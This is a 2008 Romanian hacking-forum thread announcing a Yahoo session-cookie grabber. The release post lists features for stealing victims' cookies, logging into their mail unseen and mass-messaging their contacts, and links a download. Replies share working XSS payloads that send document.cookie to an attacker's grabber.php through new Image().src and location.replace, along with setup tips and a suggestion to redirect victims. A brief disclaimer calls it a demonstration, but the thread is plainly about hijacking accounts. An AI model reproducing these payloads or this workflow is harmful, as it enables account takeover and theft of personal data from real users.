[RST] Professional Yahoo Cookie Grabber [de actualitate]

January 4, 2008

Professional Yahoo Cookie Grabber este dupa cum spune si denumirea un tool pentru capturarea cookieurilor de Yahoo.

Ce facilitati detine acest grabber?

Versiunea publica:

- o interfata placuta de tip hi-tech

- extrage odata cu cookie avatarul userului

- extrage odata cu cookie ip-ul userului

- extrage odata cu cookie id-ul userului

- scrie data si ora la care a fost capturat cookie

- contine user data - informatii decriptate din cookie ce ne dau detalii despre urmatoarele:

1. sex (gender)

2. anul nasterii (birth year)

3. Limba (language)

4. zip code

5. tara (country)

- cookie data - valorile Y si T din cookie sunt salvate separat in doua text box pentru a va fi mai usor sa le copiati

- link direct de logare - daca dati click pe id-ul capturat veti fi logati automat pe mailul userului fara a mai fi nevoie de introducerea valorilor Y si T in diferite editoare gen add n edit cookies.

- logarea automata se face direct catre mail classic. Daca userul al carui cookie il folositi are setata interfata mail beta cu ajutorul linkului direct de logare veti intra automat pe interfata clasica in acest fel evitand ca webmessengerul prezent in mail beta sa se incarce si sa apareti online.

- logarea automata nu modifica setarile interfetei puse default de catre user. Se creeaza o singura sesiune cu interfata clasica iar cand userul intra pe mail folosind user + parola va vedea interfata pe care si-a setat-o el din start. Astfel nu vor ramane urme ale prezentei voastre in acel cont.

- cookie se trimite automat in mailul pe care il setati voi din grabber.php (linia $to = 'youremail@youremail.com'; unde youremail@youremail.com trebuie schimbat cu mailul vostru)

- links:

1. Link catre contul de hi5 (daca exista cont de hi5 creeat pe acel mail)

2. Link catre contul de myspace (daca exista cont de myspace creeat pe acel mail)

3. Link catre Yahoo! profiles pentru a vizualiza profilul victimei

4. Link catre Yahoo! search pentru cautarea informatiilor despre acel id aflate pe web

5. Link catre Google! search pentru cautarea informatiilor despre acel id aflate pe web

Bug-uri: versiunea mailer (cea care va trimite cookies direct in mail) are probleme de grafica. Veti primi totusi informatiile necesare in mailul vostru dar aspectul mesajului este neplacut. Probabil aceasta problema este doar cu Yahoo! mail care filtreaza anumite tag-uri

Versiunea privata:

- prelungirea duratei de functionare a cookieurilor pentru a inlatura limita de 24 ore

- mass message in lista de Yahoo! messenger

- salvare address book cu un singur click

- mass mail in lista de contacte

- o interfata placuta de tip hi-tech

- extrage odata cu cookie avatarul userului

- extrage odata cu cookie ip-ul userului

- extrage odata cu cookie id-ul userului

- scrie data si ora la care a fost capturat cookie

- contine user data - informatii decriptate din cookie ce ne dau detalii despre urmatoarele:

1. sex (gender)

2. anul nasterii (birth year)

3. Limba (language)

4. zip code

5. tara (country)

- cookie data - valorile Y si T din cookie sunt salvate separat in doua text box pentru a va fi mai usor sa le copiati

- link direct de logare - daca dati click pe id-ul capturat veti fi logati automat pe mailul userului fara a mai fi nevoie de introducerea valorilor Y si T in diferite editoare gen add n edit cookies.

- logarea automata se face direct catre mail classic. Daca userul al carui cookie il folositi are setata interfata mail beta cu ajutorul linkului direct de logare veti intra automat pe interfata clasica in acest fel evitand ca webmessengerul prezent in mail beta sa se incarce si sa apareti online.

- logarea automata nu modifica setarile interfetei puse default de catre user. Se creeaza o singura sesiune cu interfata clasica iar cand userul intra pe mail folosind user + parola va vedea interfata pe care si-a setat-o el din start. Astfel nu vor ramane urme ale prezentei voastre in acel cont.

- cookie se trimite automat in mailul pe care il setati voi din grabber.php (linia $to = 'youremail@youremail.com'; unde youremail@youremail.com trebuie schimbat cu mailul vostru)

- links:

1. Link catre contul de hi5 (daca exista cont de hi5 creeat pe acel mail)

2. Link catre contul de myspace (daca exista cont de myspace creeat pe acel mail)

3. Link catre Yahoo! profiles pentru a vizualiza profilul victimei

4. Link catre Yahoo! search pentru cautarea informatiilor despre acel id aflate pe web

5. Link catre Google! search pentru cautarea informatiilor despre acel id aflate pe web

Versiunea privata nu va fi disponibila decat pentru cei care au contribuit la developmentul acestui grabber. Toate facilitatile exista deja, inclusiv cea de prelungire a vietii unui cookie (multumita lui Slick este posibil acest lucru).

Atentie: nu stergeti urmatorul cod din grabbed.html fara sa aveti un minim de cunostinte html pentru ca puteti strica grafica:

<title>- ::::: [R]omanian [S]ecurity [T]eam | Yahoo Professional Cookie Grabber Beta 2 
- Public Version ::::: -
</title>
<body bgcolor="#000000">


<a href="http://rstcenter.com">
[img=http://rstcenter.com/images/banner.jpg]</a></p>
<html>
<head>

Echipa care a creeat acest grabber:

- BanKai - scriptul php

- ahead - grafica

- kw3rln - sursa grabberului cu id

- Slick - prelungirea duratei de folosire a unui cookie (private version)

- Nemessis - idee, project manager

Pentru buguri, intrebari si nelamuriri strict la subiect puteti posta in acest topic.

Nota: acest tool este doar o demonstratie de programare web. Este ilegal si NU AVETI VOIE sa il folositi pentru a fura/accesa datele personale ale altor oameni decat daca aveti acordul acestora. Folositi acest tool doar pentru teste. Echipa RST nu se face responsabila daca nu respectati aceasta regula sau daca incalcati legea prin faptele voastre.

Screenshot: http://img117.imageshack.us/img117/3514/prezentareic2.png

Download link: http://rapidshare.com/files/81183578/RST_Professional_Yahoo_Cookie_Grabber.zip.html

Mai multe detalii despre cum poate fi folosit: http://rstcenter.com/forum/cum-sa-iti-ascunzi-xss-si-yahoo-xss-t8101.rst (updatat la zi)

nullbyte · January 4, 2008

Congratz RST Team & thanks.

andrewboy · January 4, 2008

felicitari ...este super..:D...nu ma primiti si pe mn in team?:D:D:)) =))

tw8 · January 4, 2008

Frumos. Nu pot sa il testez acum, dar cred ca o sa o fac mai pe seara .

Totusi, putea fi codat mai bine, in special la decodarea ID-ului si a anului de nastere .

Oricum, felicitari intregului team !

michee · January 4, 2008

congratz,congratz, mi-ai sters postu:P

katmai · January 4, 2008

Eh nu mi se pare nimic in plus fata de celalalt,inafara ca arate cateva informatii in plus :roll: .Daca era si ala facut de slick sa prelungeasca valabilitatea unui cookie era ceva in plus si frumos..dar daca nu vreti sa le dati asta e.Anyway felicitari pentru munca.

nike · January 4, 2008

am css3.js

function init() { new Image().src='http://siteulmeu/phpgrabber/grabber.php?data='+escape(document.cookie); } window.onload=init;

unde gresesc de nu mi merge ?

January 4, 2008

E mai usor de folosit katmai si are optiunea de logare direct din link cu bypass la beta. Eu m-am lovit de multe ori de problema cu webmessenger din mail beta.

Nike citeste aici http://en.rstcenter.com/how-to-hide-your-xss-yahoo-xss-files-vid-t9388.rst

amprenta · January 4, 2008

Edited : citeste ce a zis Nemessis , e valabil pentru toti . desi e putin trist ca intrebati asemenea lucruri

da vezi dupa ca sar sa sara un pic antivirusu , cel putin Bitdefenderu zice Trojan.Js.CookieMonster .

January 4, 2008

Nu mai functioneaza cu function init(). Trebuie schimbat js-ul exact cum scrie in topicul de pe english.

zbeng · January 4, 2008

ciudat de la functia $to = 'numea@nume.com';

1 mail a venit in boolk si 2 in spam

nike · January 4, 2008

am facut exact ce scrie acolo

Replace the content of css3.js with:

Cod:

location.replace ("http://yoursite.com/yourgrabber.php?cookie=" + escape(document.cookie));

si nu am reusit ... nu mi merge... cred ca sunt eu tampit

zbeng · January 4, 2008

uitate aici http://rstcenter.com/forum/yahoo-xss-t9637.rst

amprenta · January 4, 2008

ai setat permisiune de scriere pentru grabbed.html ?/ ( chmod 777 )

nike · January 4, 2008

ai setat permisiune de scriere pentru grabbed.html ?/ ( chmod 777 )

da, am setat . mi a mers grabberul vechi. stiu cum si ce sa fac in mare. cum ar trebuii sa arate exact css3.js ??? ca poate gresesc acolo

al meu arata asa: location.replace ("http://siteulmeu.com/phpgrabber/grabber.php?cookie=" + escape(document.cookie));

Nabukadnezar · January 4, 2008

adaugati un

header("Location: http://profiles.yahoo.com/$buni");

ca sa redirecteze victima la propriul profil dupa ce-i ia cookie-ul

si in mailul cu bugul le spuneti la nubi ca le-ati lasat un comment

katmai · January 4, 2008

Vezi ca unde ii bug-ul de la yahoo,la sfarsit ii un <script src.. si acolo trebuie sa pui locatia unde ii .js al tau.Si vezi ca a scris cu rosu al english section.Daca nu cunoasteti,luati ceva tutoriale de javascript si php.

moubik · January 4, 2008

iar intrebari legate de grabberul ala.

sa fie clar: acel grabber este un exemplu dintre cele mai proaste pentru incepatori. este complicat, este obfuscat, este complex. daca nu stii sa-l folosesti, nu-l folosi... cauta altceva.

D4Rk M3sSIah · January 4, 2008

Eu acuma chiar nu am chef sa incerc sa il fac sa-mi mearga, asa ca puteti posta un tutorial? Va rog mult! Mie-mi apare numai header-ul care duce spre rtszone.org, in rest nimic!

zbeng · January 4, 2008

uite tutorial http://rstcenter.com/forum/post52152.rst#52152

http://en.rstcenter.com/how-to-hide-your-xss-yahoo-xss-files-vid-t9388.rst

Scofilds · January 4, 2008

si mie tot la fel doar header-ul care duce spre rtszone.org, in rest nimic!

dc ?

tw8 · January 4, 2008

Vedeti ca e vulnerabil la XSS la ZipCode si la Language.

Va sugerez sa salvati informatiile "furate" intr-un fisier txt, nu HTML, si sa il salvati apoi ca HTML si sa il vizualizati.

Oricum, si asa poate fi folosit de un posibil atacator ca sa va fure cookie .

January 4, 2008

Cookie este "transat" pentru a da doar valorile Y si T. Un atacator nu poate sa trimita in grabber niciun script pentru ca nu ar trece de "transarea" cookieului. Poti incerca sa o faci tw8 si lasa-mi un mesaj cu rezultatele

Scofilds · January 4, 2008

Fratilor am facut exact ca in tutorial am unploadat pe un host (evonet)asa cand sa rulez imi apare doar header-ul care duce spre rtszone.org, in rest nimic VA ROG SA IMI ZICA CINEVA DE CE ?

January 4, 2008

Vedeti ca e vulnerabil la XSS la ZipCode si la Language.
Va sugerez sa salvati informatiile "furate" intr-un fisier txt, nu HTML, si sa il salvati apoi ca HTML si sa il vizualizati.
Oricum, si asa poate fi folosit de un posibil atacator ca sa va fure cookie .

1. folosind stealth xss VICTIMA NU ARE DE UNDE SA STIE UNDE ESTE GRABBERUL

2. chiar daca victima afla unde e grabberul trebe sa treaca de referer test ca sa poata injecta cookie malformat in el

3. DACA REUSHESHTE SA FACA ASTA CE O SA FACA ? SA IMI FURE COOKIEUL DE LA SITEUL UNDE E HOSTAT GRABBERUL ? WTF !?

incercatzi sa va folositzi mintea inainte de a face posturi ratate si tu si vladiii

dupa o zi de release si deja nu va mai sufar cu intrebarile si posturile idioate ... parerea mea e ca mai bine nu il lansam si gata

Sign In

[RST] Professional Yahoo Cookie Grabber [de actualitate]

Recommended Posts

Guest Nemessis

nullbyte

andrewboy

tw8

michee

katmai

nike

Guest Nemessis

amprenta

Guest Nemessis

zbeng

nike

zbeng

amprenta

nike

Nabukadnezar

katmai

moubik

D4Rk M3sSIah

zbeng

Scofilds

tw8

Guest Nemessis

Scofilds

Guest BanKai

Join the conversation

Browse

Activity

Pages